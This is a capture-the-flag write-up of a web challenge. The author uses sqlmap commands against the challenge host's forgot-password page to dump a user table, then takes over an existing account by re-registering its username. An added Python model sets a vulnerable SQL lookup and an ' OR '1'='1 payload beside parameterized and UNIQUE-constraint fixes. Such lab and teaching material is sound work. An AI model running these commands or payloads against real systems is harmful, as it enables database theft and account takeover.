A. Entering the experiment
1. Follow the hints for the experiment: the newly added login and registration page of the industrial cloud management system has vulnerabilities; find the flag.
Seeing a login and registration page, the first thing to try is SQL injection. Manual testing got nowhere for a long time, so I ran sqlmap to see whether it could find an injection point:
python sqlmap.py -u "http://111.198.29.45:56964/login.php" --data "username=123&password=123" --dbs
No injection point. As expected, the challenge author was not going to make the flag that easy for us.
Then I noticed there is also a forgot-password page, which is easy to overlook:
This one looks like it may be injectable, so run sqlmap against it:
python sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --data "username=1" --dbs
python sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --data "username=1" -D cetc004 --tables    (this lists the user table)
python sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --data "username=1" -D cetc004 -T user --columns
python sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --data "username=1" -D cetc004 -T user -C "username,password" --dump
The dump contains an account I never registered, presumably the one tied to the flag. Its password appears to be an MD5 hash; I tried to crack it without success, but that does not matter here, because
the registration page allows registering a username that already exists. Register a new account with that same username, then log in with it to obtain the flag.
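The two weaknesses the writeup chains together, modelled in Python against an in-memory SQLite table. This is an added example, not the challenge's PHP code: the table layout, the seeded account, the flag value and the rule that authorization is keyed on the username string alone are all assumptions. It shows why the forgot-password lookup was injectable (string-built SQL beside the parameterized fix) and why duplicate registration turned into a login as the existing user (no uniqueness constraint beside a table that has one).

```python
import hashlib
import sqlite3

# Constructed sample data, not taken from the challenge.
SEED_USER = "admin"                 # assumed name of the pre-existing account
SEED_PASSWORD = "seed-password"     # assumed; the real hash was never cracked
FLAG = "flag{placeholder}"          # placeholder, the real flag is not on the page


def md5_hex(text):
    """The challenge stores MD5 hashes; MD5 is shown here only to mirror that, it is not a recommendation."""
    return hashlib.md5(text.encode()).hexdigest()


def build_db(unique_username):
    """Create the assumed 'user' table, with or without a UNIQUE constraint on username."""
    conn = sqlite3.connect(":memory:")
    constraint = "UNIQUE" if unique_username else ""
    conn.execute(f"CREATE TABLE user (username TEXT {constraint}, password TEXT)")
    conn.execute("INSERT INTO user VALUES (?, ?)", (SEED_USER, md5_hex(SEED_PASSWORD)))
    conn.commit()
    return conn


def findpwd_vulnerable(conn, username):
    """Forgot-password lookup built by string concatenation: the input is spliced into the SQL text."""
    sql = f"SELECT username FROM user WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql)]


def findpwd_fixed(conn, username):
    """Same lookup with a bound parameter: the input is data, never SQL."""
    rows = conn.execute("SELECT username FROM user WHERE username = ?", (username,))
    return [row[0] for row in rows]


def register(conn, username, password):
    """Registration exactly as the challenge behaves: it never checks whether the username is taken.
    Returns False only when the database itself rejects the duplicate (UNIQUE constraint)."""
    try:
        conn.execute("INSERT INTO user VALUES (?, ?)", (username, md5_hex(password)))
        conn.commit()
        return True
    except sqlite3.IntegrityError:
        return False


def login(conn, username, password):
    """Return the authenticated identity, or None. With two rows sharing a username, the
    second row's password is enough to authenticate as that username."""
    row = conn.execute(
        "SELECT username FROM user WHERE username = ? AND password = ?",
        (username, md5_hex(password)),
    ).fetchone()
    return row[0] if row else None


def flag_for(identity):
    """Assumed authorization rule: the flag is shown to whoever is logged in as the seeded user."""
    return FLAG if identity == SEED_USER else None


if __name__ == "__main__":
    weak = build_db(unique_username=False)
    register(weak, SEED_USER, "my-own-password")          # duplicate username accepted
    print("weak schema, flag via duplicate account:", flag_for(login(weak, SEED_USER, "my-own-password")))

    hardened = build_db(unique_username=True)
    print("UNIQUE schema, duplicate accepted:", register(hardened, SEED_USER, "my-own-password"))
    print("string-built lookup with a quote in the input:", findpwd_vulnerable(hardened, "' OR '1'='1"))
    print("parameterized lookup with the same input:", findpwd_fixed(hardened, "' OR '1'='1"))
```

The detection side follows from the same model: a registration endpoint that returns success for an existing username, or a user table with more than one row per username, is the signal to look for. The fix is two-fold, a UNIQUE constraint (or an explicit existence check inside the same transaction) on the registration path, and bound parameters on every lookup that takes user input, the forgot-password page included.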